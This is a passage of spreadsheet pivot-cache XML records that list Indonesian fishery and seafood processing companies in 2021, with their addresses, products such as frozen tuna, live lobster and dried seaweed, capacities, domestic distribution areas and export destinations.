    <s v="Jl. Cinta Karya No.172 RT 011 RW 005, Kel. Cikopo, Kec. Bungursari, Kabupaten Purwakarta&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Bernilai Tambah Beku (Ikan Marinasi)"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Purwakarta, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24364"/>
    <x v="1022"/>
    <s v="CV. 3 BERKAT MURNI BARA"/>
    <s v="Ruko 237 No.21, Kel. Sudiang, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Bream, Lencam, Kerapu, Kakatua, Kakap, Kaci-kaci, Barramundi)"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Makassar"/>
    <s v="Hong Kong, Malaysia, Saudi Arabia"/>
  </r>
  <r>
    <n v="24365"/>
    <x v="1022"/>
    <s v="CV. 3 BERKAT MURNI BARA"/>
    <s v="Ruko 237 No.21, Kel. Sudiang, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Makassar"/>
    <s v="Saudi Arabia"/>
  </r>
  <r>
    <n v="24366"/>
    <x v="1022"/>
    <s v="CV. 3 BERKAT MURNI BARA"/>
    <s v="Ruko 237 No.21, Kel. Sudiang, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Loin Segar"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="7000"/>
    <s v="Kota Makassar"/>
    <s v="Japan, Saudi Arabia"/>
  </r>
  <r>
    <n v="24367"/>
    <x v="1022"/>
    <s v="CV. 3 BERKAT MURNI BARA"/>
    <s v="Ruko 237 No.21, Kel. Sudiang, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Lobster Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="24000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24372"/>
    <x v="1023"/>
    <s v="PT. RED RIBBON INDONESIA"/>
    <s v="Jl. KL Yos Sudarso KM 10,5 KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="269781"/>
    <s v="Kota Surabaya"/>
    <s v="Japan, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24373"/>
    <x v="1023"/>
    <s v="PT. RED RIBBON INDONESIA"/>
    <s v="Jl. KL Yos Sudarso KM 10,5 KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Paha Kodok Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="79880"/>
    <m/>
    <s v="Belgium, France"/>
  </r>
  <r>
    <n v="24375"/>
    <x v="587"/>
    <s v="PT. ARABIKATAMA KHATULISTIWA FISHING INDUSTRY"/>
    <s v="Penambulai, Kel. Warabal, Kec. Aru Tengah Selatan, Kabupaten Kepulauan Aru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Hiu Beku"/>
    <d v="2021-04-07T00:00:00"/>
    <n v="11600"/>
    <s v="Kota Jakarta Timur"/>
    <m/>
  </r>
  <r>
    <n v="24376"/>
    <x v="31"/>
    <s v="PT. PERMATA MARINDO JAYA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Hiu Raya Blok D Kav No.4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="7980"/>
    <m/>
    <s v="Denmark"/>
  </r>
  <r>
    <n v="24377"/>
    <x v="31"/>
    <s v="PT. PERMATA MARINDO JAYA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Hiu Raya Blok D Kav No.4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Lencam, Sebelah, Kerapu, Layur, Bawal, Kakap, Barramundi)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="3845"/>
    <m/>
    <s v="Belgium, Singapore, United States"/>
  </r>
  <r>
    <n v="24378"/>
    <x v="31"/>
    <s v="PT. PERMATA MARINDO JAYA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Hiu Raya Blok D Kav No.4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="2484"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24379"/>
    <x v="31"/>
    <s v="PT. PERMATA MARINDO JAYA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Hiu Raya Blok D Kav No.4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Lemadang, Marlin, Gindara, Layaran, Cakalang, Tenggiri)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="390000"/>
    <m/>
    <s v="Belgium, Spain"/>
  </r>
  <r>
    <n v="24380"/>
    <x v="31"/>
    <s v="PT. PERMATA MARINDO JAYA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Hiu Raya Blok D Kav No.4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="71000"/>
    <m/>
    <s v="Belgium, Japan, United States"/>
  </r>
  <r>
    <n v="24381"/>
    <x v="31"/>
    <s v="PT. PERMATA MARINDO JAYA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Hiu Raya Blok D Kav No.4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24384"/>
    <x v="1024"/>
    <s v="MENARA JAYA FOODS"/>
    <s v="Jl. Warujaya I Blok A No.117 RT 006 RW 022, Kel. Mekarjaya, Kec. Sukmajaya, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Olahan Lapis Kulit Tahu"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Semarang, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="24385"/>
    <x v="1024"/>
    <s v="MENARA JAYA FOODS"/>
    <s v="Jl. Warujaya I Blok A No.117 RT 006 RW 022, Kel. Mekarjaya, Kec. Sukmajaya, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Seafood Bernilai Tambah Beku (Kaki Naga, Siomay Ikan, Dimsum Ikan, Dimsum Udang) "/>
    <d v="2021-02-26T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="24386"/>
    <x v="1025"/>
    <s v="CV. KERITCU SUPER SINDI"/>
    <s v="Jl. RE Martadinata No.09 RT 005 RW 002, Kel. Opas Indah, Kec. Taman Sari, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Kerupuk Telur Cumi-Cumi"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="500"/>
    <s v="Kota Pangkal Pinang"/>
    <m/>
  </r>
  <r>
    <n v="24392"/>
    <x v="1026"/>
    <s v="PT. IRIAN MARINE PRODUCT DEVELOPMENT"/>
    <s v="Jl. Udang Klademak I, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Udang Beku"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Timur, Kota Surabaya, Kabupaten Raja Ampat, Kota Sorong"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24394"/>
    <x v="919"/>
    <s v="PT. YUXING ALGAE INTERNATIONAL"/>
    <s v="Pesisir Timur RT 001 RW 001, Kel. Klatakan, Kec. Kendit, Kabupaten Situbondo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Alkali Treated Cottonii Chips"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="700000"/>
    <m/>
    <s v="China, United Kingdom, Viet Nam"/>
  </r>
  <r>
    <n v="24395"/>
    <x v="1027"/>
    <s v="DUA PUTRI"/>
    <s v="RT 05 RW 02, Kel. Ngerong, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Abon Ikan"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="250"/>
    <s v="Kota Jakarta Pusat, Kota Semarang, Kabupaten Pasuruan, Kota Malang, Kota Pasuruan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24404"/>
    <x v="233"/>
    <s v="PT. MODERN MITRA SEJATI"/>
    <s v="Jl. Rungkut Industri III No.85, Kel. Rungkut Tengah, Kec. Gunung Anyar, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="480000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="24405"/>
    <x v="1028"/>
    <s v="PT, SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Jl, Muara Baru Ujung Blok S Kav No,12B RT 006 RW 017, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="10800000"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24406"/>
    <x v="1028"/>
    <s v="PT, SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Jl, Muara Baru Ujung Blok S Kav No,12B RT 006 RW 017, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Malong, Gulama, Kerapu, Layur, Sukang, Bawal, Kakap, Baronang)"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="240000"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24407"/>
    <x v="1028"/>
    <s v="PT, SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Jl, Muara Baru Ujung Blok S Kav No,12B RT 006 RW 017, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Makerel Atlantik, Capelin, Kembung, Gindara, Salem, Layang, Tenggiri)"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24408"/>
    <x v="1028"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Jl. Muara Baru Ujung Blok S Kav No.12B RT 006 RW 017, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Barat"/>
    <s v="China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24409"/>
    <x v="1028"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Jl. Muara Baru Ujung Blok S Kav No.12B RT 006 RW 017, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="100"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24410"/>
    <x v="1028"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Jl. Muara Baru Ujung Blok S Kav No.12B RT 006 RW 017, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="100"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24411"/>
    <x v="1028"/>
    <s v="PT, SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Jl, Muara Baru Ujung Blok S Kav No,12B RT 006 RW 017, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Beku"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="240000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24412"/>
    <x v="1029"/>
    <s v="PT. LAUTAN PURNAMA INTERNUSA"/>
    <s v="Pluit Timur Blok C Timur No.11, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Barramundi, Bawal, Kerapu, Lencam, Janahan, Layur, Kakatua, Kakap, Baronang, Terisi, Lidah, Cunang)"/>
    <d v="2021-04-09T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24414"/>
    <x v="1029"/>
    <s v="PT. LAUTAN PURNAMA INTERNUSA"/>
    <s v="Pluit Timur Blok C Timur No.11, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Barramundi, Bawal, Lencam, Kerapu, Layur, Kakatua, Kakap, Baronang, Terisi, Lidah, Cunang)"/>
    <d v="2021-04-09T00:00:00"/>
    <n v="48000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24415"/>
    <x v="1029"/>
    <s v="PT. LAUTAN PURNAMA INTERNUSA"/>
    <s v="Pluit Timur Blok C Timur No.11, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Bonito, Tongkol, Marlin, Layaran, Cakalang, Tenggiri)"/>
    <d v="2021-04-09T00:00:00"/>
    <n v="38000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24416"/>
    <x v="1029"/>
    <s v="PT. LAUTAN PURNAMA INTERNUSA"/>
    <s v="Pluit Timur Blok C Timur No.11, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Bonito, Tongkol, Marlin, Layaran, Cakalang, Tenggiri)"/>
    <d v="2021-04-09T00:00:00"/>
    <n v="32000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24417"/>
    <x v="1029"/>
    <s v="PT. LAUTAN PURNAMA INTERNUSA"/>
    <s v="Pluit Timur Blok C Timur No.11, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-09T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24418"/>
    <x v="1029"/>
    <s v="PT. LAUTAN PURNAMA INTERNUSA"/>
    <s v="Pluit Timur Blok C Timur No.11, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-09T00:00:00"/>
    <n v="15000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="24423"/>
    <x v="664"/>
    <s v="PT. YU SHEN FISHERY INDONESIA"/>
    <s v="Jl. Pemelisan No. 168 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Rajungan Hidup"/>
    <d v="2021-04-07T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24424"/>
    <x v="664"/>
    <s v="PT. YU SHEN FISHERY INDONESIA"/>
    <s v="Jl. Pemelisan No. 168 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Keong Laut Hidup"/>
    <d v="2021-04-07T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24425"/>
    <x v="664"/>
    <s v="PT. YU SHEN FISHERY INDONESIA"/>
    <s v="Jl. Pemelisan No. 168 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Udang Hidup"/>
    <d v="2021-04-07T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24426"/>
    <x v="1030"/>
    <s v="PT. SUMBER JAYA BUMI LESTARI"/>
    <s v="Jl. Daan Mogot Km 17 No.40, Kel. Kalideres, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Asin Kering"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="180000"/>
    <m/>
    <s v="Sri Lanka"/>
  </r>
  <r>
    <n v="24427"/>
    <x v="1031"/>
    <s v="CV. MULE JATI"/>
    <s v="Kampung Permas, Dusun Montong Agung, Kel. Pare Mas, Kec. Jerowaru, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Lobster Hidup"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="93750"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Mataram"/>
    <s v="China, Hong Kong, Japan, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24428"/>
    <x v="1032"/>
    <s v="PT. SUTRACO NUSANTARA MEGAH"/>
    <s v="Pattene 88 Cluster Green Park Blok C18-C20, Kel. Temmappaduae, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="2000000"/>
    <s v="Kota Surabaya"/>
    <s v="China, India, Japan, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="24429"/>
    <x v="1033"/>
    <s v="CV. TALAUD IKAN MANDIRI"/>
    <s v="Jl. Trans Mala, Lingkungan IV Blok R No.15, Kel. Melonguane Timur, Kec. Melonguane, Kabupaten Kepulauan Talaud&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24430"/>
    <x v="1033"/>
    <s v="CV. TALAUD IKAN MANDIRI"/>
    <s v="Jl. Trans Mala, Lingkungan IV Blok R No.15, Kel. Melonguane Timur, Kec. Melonguane, Kabupaten Kepulauan Talaud&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Bitung"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24431"/>
    <x v="1033"/>
    <s v="CV. TALAUD IKAN MANDIRI"/>
    <s v="Jl. Trans Mala, Lingkungan IV Blok R No.15, Kel. Melonguane Timur, Kec. Melonguane, Kabupaten Kepulauan Talaud&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Sukang, Kakatua, Kakap, Kurisi, Barramundi)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24432"/>
    <x v="1033"/>
    <s v="CV. TALAUD IKAN MANDIRI"/>
    <s v="Jl. Trans Mala, Lingkungan IV Blok R No.15, Kel. Melonguane Timur, Kec. Melonguane, Kabupaten Kepulauan Talaud&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Segar (Lencam, Kerapu, Sukang, Kakatua, Kakap, Kurisi, Barramundi)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24434"/>
    <x v="1033"/>
    <s v="CV. TALAUD IKAN MANDIRI"/>
    <s v="Jl. Trans Mala, Lingkungan IV Blok R No.15, Kel. Melonguane Timur, Kec. Melonguane, Kabupaten Kepulauan Talaud&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Barakuda, Malalugis, Lemadang, Marlin, Cakalang, Tenggiri, Pedang)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Bitung"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24435"/>
    <x v="1033"/>
    <s v="CV. TALAUD IKAN MANDIRI"/>
    <s v="Jl. Trans Mala, Lingkungan IV Blok R No.15, Kel. Melonguane Timur, Kec. Melonguane, Kabupaten Kepulauan Talaud&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Segar (Barakuda, Malalugis, Lemadang, Marlin, Cakalang, Tenggiri, Pedang)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Bitung"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24436"/>
    <x v="1031"/>
    <s v="CV. MULE JATI"/>
    <s v="Kampung Permas, Dusun Montong Agung, Kel. Pare Mas, Kec. Jerowaru, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Lobster Hidup"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="36000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Mataram"/>
    <s v="Brunei Darussalam, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24438"/>
    <x v="99"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTRIES"/>
    <s v="Jl. Laks. RE. Martadinata I, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Lencam, Kuniran, Kerapu, Malalugis, Kakatua, Pinjalo, Kakap, Kaci-kaci, Barramundi)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="660000"/>
    <m/>
    <s v="Australia, Canada, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Russian Federation, United Arab Emirates, United States"/>
  </r>
  <r>
    <n v="24439"/>
    <x v="99"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTRIES"/>
    <s v="Jl. Laks. RE. Martadinata I, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Lencam, Kuniran, Kerapu, Kakatua, Pinjalo, Kakap, Barramundi)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Australia, Canada, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Russian Federation, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24440"/>
    <x v="99"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTRIES"/>
    <s v="Jl. Laks. RE. Martadinata I, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Cobia, Lemadang, Gindara, Cakalang, Tenggiri, Todak)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="450000"/>
    <m/>
    <s v="Australia, Hong Kong, Korea, Democratic People's Republic of, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24441"/>
    <x v="99"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTRIES"/>
    <s v="Jl. Laks. RE. Martadinata I, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Australia, Canada, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24442"/>
    <x v="99"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTRIES"/>
    <s v="Jl. Laks. RE. Martadinata I, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Gurita Rebus Beku"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="480000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24443"/>
    <x v="99"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTRIES"/>
    <s v="Jl. Laks. RE. Martadinata I, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Australia, Canada, China, Hong Kong, Korea, Democratic People's Republic of, Russian Federation, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24444"/>
    <x v="99"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTRIES"/>
    <s v="Jl. Laks. RE. Martadinata I, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Australia, Canada, China, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24445"/>
    <x v="99"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTRIES"/>
    <s v="Jl. Laks. RE. Martadinata I, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="1140000"/>
    <m/>
